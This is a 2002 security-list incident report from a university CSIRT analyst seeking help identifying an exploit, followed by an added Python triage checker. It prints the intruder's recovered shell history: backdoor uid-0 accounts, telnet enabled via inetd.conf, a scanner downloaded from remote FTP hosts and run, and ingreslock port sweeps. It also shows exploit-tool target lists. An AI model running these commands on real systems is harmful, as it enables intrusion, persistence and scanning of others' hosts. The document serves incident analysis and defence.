Fellow Analysts:

This morning several of our systems were compromised and I am still working to find out what exploit was used. Please offer any advice you can. A utility was left behind, along with a massive number of systems listed in output log files that were created by this utility. I have provided all my information below.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-= My notes
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

I went through the system and found the following things. The /tmp directory was the hacker's home directory he was using. Turns out he deleted that .bash_history file and forgot to nail /root/.bash_history. However, it is still unclear to me how he broke in.

Notice that he did an "echo telnetd >>" over to inetd.conf and started up telnetd. Yeh, he could have run the telnetd b0f exploits against it, but what's the point? He already had root access to the machine.

I also checked the version of SSHD; I've checked its version against my 500 TARGETS for ./x2, ./x3 and ./x5 and it doesn't seem to match anything.

I checked to see if snmp was running (it wasn't running).

Does anyone know if the Redhat 6.2 default install contained a vulnerable wu_ftpd? Unfortunately the machine was rebuilt before I could check the version of wu_ftpd. I went ahead and checked my exploits for it and wonder if anyone here has had any default wuftpd installs of redhat 6.2 hit?

If anyone has responded to a similar machine, please let me know!

Eric

[loki@tigerteam1 woot]$ ./forcer -t0
./forcer magic
./forcer <type> <addr>
1) RH7.2 - 2.6.2(1) Wed Aug 9 05:54:50 EDT 2002
2) RH7.2 - wu-2.6.2(2)
3) Special wu-2.6.3(3)

[loki@tigerteam1 new]$ ./wu-sploit -t0
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
Compiled for MnM 01/12/2001..pr0t!

num . description
----+-------------------------------------------------------
  1 | Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm]
  2 | Debian potato [wu-ftpd_2.6.0-3.deb]
  3 | Debian potato [wu-ftpd_2.6.0-5.1.deb]
  4 | Debian potato [wu-ftpd_2.6.0-5.3.deb]
  5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb]
  6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]
  7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]
  8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]
  9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]
 10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]
 11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]
 12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]
 13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]
 14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]
 15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]
 16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]
 17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]
 18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]
 19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
 20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]
 21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]
 22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]
 23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]
 24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]
 25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]
 26 | SuSE 7.0 [wuftpd.rpm]
 27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm]
 28 | SuSE 7.1 [wuftpd.rpm]
 29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm]
 30 | SuSE 7.2 [wuftpd.rpm]
 31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm]
 32 | SuSE 7.3 [wuftpd.rpm]
 33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
 34 | Slackware 7.1

[root@tigerteam1 floppy]# telnet 192.168.0.1 22
Connected to 192.168.0.1 22
Escape character is '^]'.
SSH-1.99-OpenSSH_3.0.2p1

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-= System Info
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Redhat 6.2 (default install)
SSHD
RPC*

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-= # ps -aux
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

root         1  0.0  0.1  1120  416 ?      S    Feb25   0:04 init
root         2  0.0  0.0     0    0 ?      SW   Feb25   0:00 [keventd]
root         3  0.0  0.0     0    0 ?      SW   Feb25   0:00 [kapm-idled]
root         4  0.0  0.0     0    0 ?      SWN  Feb25   0:00 [ksoftirqd_CPU0]
root         5  0.0  0.0     0    0 ?      SW   Feb25   0:10 [kswapd]
root         6  0.0  0.0     0    0 ?      SW   Feb25   0:00 [kreclaimd]
root         7  0.0  0.0     0    0 ?      SW   Feb25   0:00 [bdflush]
root         8  0.0  0.0     0    0 ?      SW   Feb25   0:00 [kupdated]
root         9  0.0  0.0     0    0 ?      SW   Feb25   0:00 [khubd]
bin        348  0.0  0.1  1212  484 ?      S    Feb25   0:00 portmap
rpcuser    368  0.0  0.2  1340  544 ?      S    Feb25   0:00 rpc.statd
root       382  0.0  0.1  1104  400 ?      S    Feb25   0:00 /usr/sbin/apmd -p 10 -w 5 -W -s /etc/sysconfig/apm-scripts/suspend -r
root       434  0.0  0.1  1208  444 ?      S    Feb25   0:00 /usr/sbin/automount --timeout 60 /misc file /etc/auto.misc
root       436  0.0  0.1  1208  500 ?      S    Feb25   0:00 /usr/sbin/automount --timeout 60 /home file /etc/auto.home
root       441  0.0  0.1  1208  444 ?      S    Feb25   0:00 /usr/sbin/automount --timeout 60 /auto file /etc/auto.auto
root       483  0.0  0.3  6264 1016 ?      S    Feb25   0:00 /sbin/mount.smbfs //physast1/Export /physast1 -o rw username turnshek
root       502  0.0  0.1  1172  500 ?      S    Feb25   0:06 syslogd -m 0
root       511  0.0  0.1  1944  436 ?      S    Feb25   0:10 klogd
nobody     525  0.0  0.2  1312  600 ?      S    Feb25   0:00 identd -e -o
nobody     529  0.0  0.2  1312  600 ?      S    Feb25   0:00 identd -e -o
nobody     530  0.0  0.2  1312  600 ?      S    Feb25   0:03 identd -e -o
nobody     531  0.0  0.2  1312  600 ?      S    Feb25   0:03 identd -e -o
nobody     532  0.0  0.2  1312  600 ?      S    Feb25   0:00 identd -e -o
daemon     543  0.0  0.1  1144  464 ?      S    Feb25   0:00 /usr/sbin/atd
root       557  0.0  0.2  1328  556 ?      S    Feb25   0:00 crond
root       575  0.0  0.1  1156  496 ?      S    Feb25   0:00 inetd
root       589  0.0  0.1  1204  440 ?      S    Feb25   0:00 lpd
root       615  0.0  0.1  1192  316 ?      S    Feb25   0:00 rpc.rquotad
root       645  0.0  0.1  1248  364 ?      S    Feb25   0:00 rpc.mountd
root       654  0.0  0.0     0    0 ?      SW   Feb25   0:00 [nfsd]
root       655  0.0  0.0     0    0 ?      SW   Feb25   0:00 [nfsd]
root       656  0.0  0.0     0    0 ?      SW   Feb25   0:00 [nfsd]
root       657  0.0  0.0     0    0 ?      SW   Feb25   0:00 [lockd]
root       658  0.0  0.0     0    0 ?      SW   Feb25   0:00 [rpciod]
root       659  0.0  0.0     0    0 ?      SW   Feb25   0:00 [nfsd]
root       660  0.0  0.0     0    0 ?      SW   Feb25   0:00 [nfsd]
root       661  0.0  0.0     0    0 ?      SW   Feb25   0:00 [nfsd]
root       662  0.0  0.0     0    0 ?      SW   Feb25   0:00 [nfsd]
root       663  0.0  0.0     0    0 ?      SW   Feb25   0:00 [nfsd]
condor     696  0.0  0.4  2816 1080 ?      S    Feb25   1:12 /auto/condor/sbin/condor_master
condor     704  0.0  0.6  3596 1576 ?      S    Feb25   0:56 condor_startd -f
condor     715  0.0  0.4  3324 1060 ?      S    Feb25   0:00 condor_schedd -f
root       741  0.0  0.3  2432  780 ?      S    Feb25   0:00 sendmail: accepting connections
root       756  0.0  0.1  1156  408 ?      S    Feb25   0:00 gpm -t imps2
xfs        803  0.0  0.4  3404 1072 ?      S    Feb25   0:01 xfs -droppriv -daemon -port -1
root       846  0.0  0.2  2092  672 ?      S    Feb25   0:29 sshd
root       852  0.0  0.1  1092  336 tty1   S    Feb25   0:00 /sbin/mingetty tty1
root       853  0.0  0.1  1092  336 tty2   S    Feb25   0:00 /sbin/mingetty tty2
root       854  0.0  0.1  1092  336 tty3   S    Feb25   0:00 /sbin/mingetty tty3
root       855  0.0  0.1  1092  336 tty4   S    Feb25   0:00 /sbin/mingetty tty4
root       858  0.0  0.1  1092  336 tty5   S    Feb25   0:00 /sbin/mingetty tty5
root       859  0.0  0.1  1092  336 tty6   S    Feb25   0:00 /sbin/mingetty tty6
root       860  0.0  0.2  2744  620 ?      S    Feb25   0:00 /usr/bin/gdm -nodaemon
root       865  2.8  2.5 48200 6564 ?      S    Feb25 358:24 /etc/X11/X -auth /var/gdm/:0.Xauth :0
root       866  0.0  0.3  3452  972 ?      S    Feb25   0:00 /usr/bin/gdm -nodaemon
turnshek 19979  0.0  0.7  5640 1864 ?      S    Mar03   0:00 /usr/bin/gnome-session
turnshek 20009  0.0  0.6  5436 1596 ?      S    Mar03   0:00 gnome-smproxy --sm-config-prefix /.gnome-smproxy-lr5q76/ --sm-client-
turnshek 20013  0.0  0.6  4376 1676 ?      S    Mar03   0:03 enlightenment -theme /usr/share/enlightenment/themes/CleanBig -smfile
turnshek 20019  0.9  0.7  5968 2036 ?      S    Mar03  32:05 magicdev --sm-client-id 11888e7113000098519292400000009670005
turnshek 20030  0.0  0.3  2636  804 ?      S    Mar03   0:00 gnome-name-service
turnshek 20032  0.0  1.0  7072 2652 ?      S    Mar03   0:01 panel --sm-config-prefix /panel.d/Session-Cjxxlw/ --sm-client-id 1188
turnshek 20034  0.0  0.6  3188 1648 ?      S    Mar03   0:05 xscreensaver -no-splash -timeout 20 -nice 10
turnshek 20036  0.0  0.9  7536 2404 ?      S    Mar03   0:00 gmc --sm-config-prefix /gmc-mKvBkw/ --sm-client-id 11888e711300009851
turnshek 20042  0.0  0.9  6100 2388 ?      S    Mar03   0:09 gnomepager_applet --activate-goad-server gnomepager_applet
turnshek 20044  0.0  0.9  6068 2308 ?      S    Mar03   0:00 gen_util_applet --activate-goad-server gen_util_applet
turnshek 22000  0.1  2.0 56824 5168 ?      S    Mar04   4:55 /usr/lib/netscape/netscape-communicator -irix-session-management
turnshek 22016  0.0  0.2 16660  664 ?      S    Mar04   0:00 (dns helper)
turnshek 22046  0.0  0.8  5832 2096 ?      S    Mar04   0:08 gnome-terminal
turnshek 22047  0.0  0.1  1144  440 ?      S    Mar04   0:00 gnome-pty-helper
turnshek 22048  0.0  0.2  2424  600 pts/0  S    Mar04   0:00 -csh
turnshek 25361  0.0  0.8  5800 2100 ?      S    Mar05   0:00 gnome-terminal
turnshek 25362  0.0  0.1  1144  440 ?      S    Mar05   0:00 gnome-pty-helper
turnshek 25363  0.0  0.2  2424  600 pts/1  S    Mar05   0:00 -csh
root      7402  0.0  0.3  1704  928 ?      S    03:49   0:00 bash -i
root      9237  0.0  0.1  1112  404 ?      S    04:50   0:00 tail -f 211.out
root      9506  0.0  0.1  1104  396 ?      S    05:07   0:00 tail -f 211.out
root     10302  0.0  0.1  1100  384 ?      S    06:35   0:00 tail -f 122.out
root     11808  9.8  0.2  1416  692 ?      RN   07:36   0:25 ./synscan 130 130.out eth0 30000 1524
root     11812 52.3  0.2  1412  692 ?      RN   07:36   2:13 ./synscan 130 130.out eth0 30000 1524
root     11817  0.0  0.0     0    0 ?      ZN   07:38   0:00 [synscan <defunct>]
root     11818  0.0  0.0     0    0 ?      ZN   07:38   0:00 [synscan <defunct>]
root     11819  0.0  0.0     0    0 ?      ZN   07:38   0:00 [synscan <defunct>]
root     11820  0.0  0.0     0    0 ?      ZN   07:38   0:00 [synscan <defunct>]
root     11821  0.0  0.0     0    0 ?      ZN   07:38   0:00 [synscan <defunct>]
root     11822  0.0  0.0     0    0 ?      ZN   07:39   0:00 [synscan <defunct>]
turnshek 11825 26.4  2.6 21660 6864 ?      RN   07:39   0:16 sproingies -root
root     11830  0.0  0.0     0    0 ?      ZN   07:39   0:00 [synscan <defunct>]
root     11834  0.6  0.6  2996 1580 ?      S    07:40   0:00 sshd
root     11835  0.0  0.3  1724  972 pts/2  S    07:40   0:00 -bash
root     11859  0.0  0.3  2556  872 pts/2  R    07:40   0:00 ps -augxw

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-= Contents of /etc/passwd
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

u:x:12347:12347::/tmp:/bin/bash
r:x:0:12348::/tmp:/bin/bash

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-= Output generated by synscan1.6.tar (contains IP addresses of systems
-= with port 1524 (ingreslock) open, logging connections that produce a
-= # prompt)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

122.out
128.out
130.out
218.out

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-= .bash_history
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

uname -a
cat /proc/cpuifo
cat /proc/cpuinfo' '
cat /proc/cpuinfo
ping -c 5 www.yahoo.com
/usr/sbin/adduser -p "" u
tail /etc/passwd
/usr/sbin/adduser -p "" -d /tmp u
/usr/sbin/adduser -p "" -d /tmp -u 0 r
grep rsdh /etc/inetd.conf
grep rsh /etc/inetd.conf
grep shell /etc/inetd.conf
cat /etc/inetd.conf
ls -al /etc/inetd.conf
locate ...
/sbin/ifconfig -a
dmesg | grep -i promi
tail /etc/rc.d/rc.local
ps auwx| grep named
cat /etc/redhat-rel*
ps auwx| grep stat
exit
la -L /UAE/AVIN/IN.DRPS
ls -al /usr/sbin/in.ftpd
locate in.ftpd
tail /etc/passwd
echo "telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd" >> /etc/inetd.conf
ps auwx| grep inetd
kill -HUP 575
exit
cat /etc/hosts.deny
mv /etc/hosts.deny /etc/host.deny
exit
locate in.rlogin
ls -al /usr/sbin/in.*
locate telnet
ping -c 10 www.yahoo.com
wget
which lynx
ncftp cd /tmp
#cd /tmp;ncftpget -u <SANITIZED> -p <SANITIZED> ftp://211.23.134.186/../../home/test3/t0rnscan;rm -rf /root/.ncftp;chmod 755 t0rnscan
cd /tmp;ncftpget -u <SANITIZED> -p <SANITIZED> ftp://211.172.226.26/../../tmp/synscan
ls -al
cat fuk.ps
chmod 755 synscan
nohup ./synscan 216 216.out eth0 10000 1524 >/dev/null 2>/dev/null&2>/dev/null
ping -c 5 www.yahoo.com
ls -al 216.out
ls -al 216.out
grep "#" 216.out
ls -al 216.out
grep "#" 216.out;exit
cd /tmp
grep "#" *.out
tail 216.out
tail 216.out
tail 216.out
grep access *.out
tail 216.out
grep "#" 216.out
tail 216.out
tail 216.out
tail 216.out
ps auwx| grep synscan
tail 216.out
tail 216.out
killall -9 synscan
egrep "access|#" *.out
rm -rf 216.out
killall -9 synscan
nohup ./synscan 217 217.out eth0 30000 1524 >/dev/null 2>/dev/null&2>/dev/null
ping -c 5 www.yahoo.com
ls -al 217.out
cat 217.out
cat 217.out
tail 217.out
grep "#" 217.out
tail 217.out
tail 217.out
tail 217.out
tail 217.out
grep "#" 217.out
tail 217.out
grep "#" 217.out | grep -v root
tail 217.out
tail 217.out
tail 217.out
tail 217.out
tail 217.out
grep "#" 217.out
tail 217.out
tai217.out
tail 217.out
grep "#" 217.out | grep -v root
rm -rf 217.out
nohup ./synscan 218 218.out eth0 30000 1524 >/dev/null 2>/dev/null&2>/dev/null
ls -al 218.out
ls -al 218.out
ls -al 218.out
cat 218.out
exit
cd /tmp
ls
tail 218.out
grep "#" 218.out
tail *.out
killall -9 synscan
nohup ./synscan 24 24.out eth0 50000 10008 >/dev/null 2>/dev/null&2>/dev/null
ls -al 24.out
ls -al 24.out
ls -al 24.out
ls -al 24.out
p[s auwwx| grep synscan
ps auwx| grep synscan
ls -al 24.out
ls -al 24.out
ls -al 24.out
ls -al 24.out
ping -c 5 www.yahoo.com
ping -c 5 www.yahoo.com
ls -al 24.out
killall -9 synscan
nohup ./synscan 24 24.out eth0 30000 10008 >/dev/null 2>/dev/null&2>/dev/null
ping -c 5 www.yahoo.com
tail -f 24.out&2 >/dev/null
ps auwx| grep tail
ls -al 24.out
/ /sbin/ifconfig -a
locate tcp.log
last| head -5
tail /home/sandhya/.bash_history
ls -al ~sandhya
cat /home/sandhya/.history
cat ~sandhya/.history
w
ls -al 24.out

================================================
Eric S. Hines
Technical Lead
Information Security Group
Computer Security Incident Response Team (CSIRT)
------------------------------------------------
University of Pittsburgh
Cathedral of Learning #701
Pittsburgh PA, 15260
[ph] +1 412 624-6728
[mo] +1 412 334-2379
[em] eric3at_private
[al] 4123342370at_private
================================================

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
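An added triage helper, not part of Eric's post, that checks a host for the three persistence changes his .bash_history shows: a second uid-0 account and accounts homed in /tmp, a telnet line appended to inetd.conf, and /etc/hosts.deny renamed out of the way. The passwd and inetd.conf samples are constructed from the evidence quoted above, not copied from the compromised system.

```python
# Added triage helper (not part of Eric's post): checks the three persistence
# indicators his notes describe on a Red Hat 6.2-style box. Sample inputs are
# constructed from the evidence quoted above, not captured from the system.
from typing import Iterable, List

SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
turnshek:x:500:500::/home/turnshek:/bin/csh
u:x:12347:12347::/tmp:/bin/bash
r:x:0:12348::/tmp:/bin/bash
"""

SAMPLE_INETD_CONF = """ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
#telnet stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
"""

def suspicious_passwd_entries(passwd: str) -> List[str]:
    """Flag non-root uid-0 accounts and accounts whose home directory is /tmp."""
    findings = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) != 7:          # skip blank or malformed lines
            continue
        name, uid, home = fields[0], fields[2], fields[5]
        if uid == "0" and name != "root":
            findings.append(f"extra uid-0 account: {name}")
        if home == "/tmp" or home.startswith("/tmp/"):
            findings.append(f"home directory under /tmp: {name}")
    return findings

def enabled_inetd_services(inetd_conf: str) -> List[str]:
    """Return the service names of active (uncommented) inetd.conf entries."""
    return [line.split()[0] for line in inetd_conf.splitlines()
            if line.strip() and not line.lstrip().startswith("#")]

def triage(passwd: str, inetd_conf: str, files_present: Iterable[str]) -> List[str]:
    """Combine the checks; files_present is the set of paths that exist under /etc."""
    present = set(files_present)
    findings = suspicious_passwd_entries(passwd)
    if "telnet" in enabled_inetd_services(inetd_conf):
        findings.append("telnet enabled in inetd.conf")
    if "/etc/hosts.deny" not in present:
        findings.append("/etc/hosts.deny missing (tcp_wrappers deny list disabled)")
    if "/etc/host.deny" in present:
        findings.append("/etc/host.deny present (hosts.deny renamed?)")
    return findings

if __name__ == "__main__":
    for f in triage(SAMPLE_PASSWD, SAMPLE_INETD_CONF, {"/etc/host.deny", "/etc/inetd.conf"}):
        print("FINDING:", f)
```

On a live system the same functions can be fed the contents of /etc/passwd and /etc/inetd.conf and the result of listing /etc; a clean box returns an empty list.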
This archive was generated by hypermail 2b30 : Wed Mar 06 2002 - 14:14:11 PST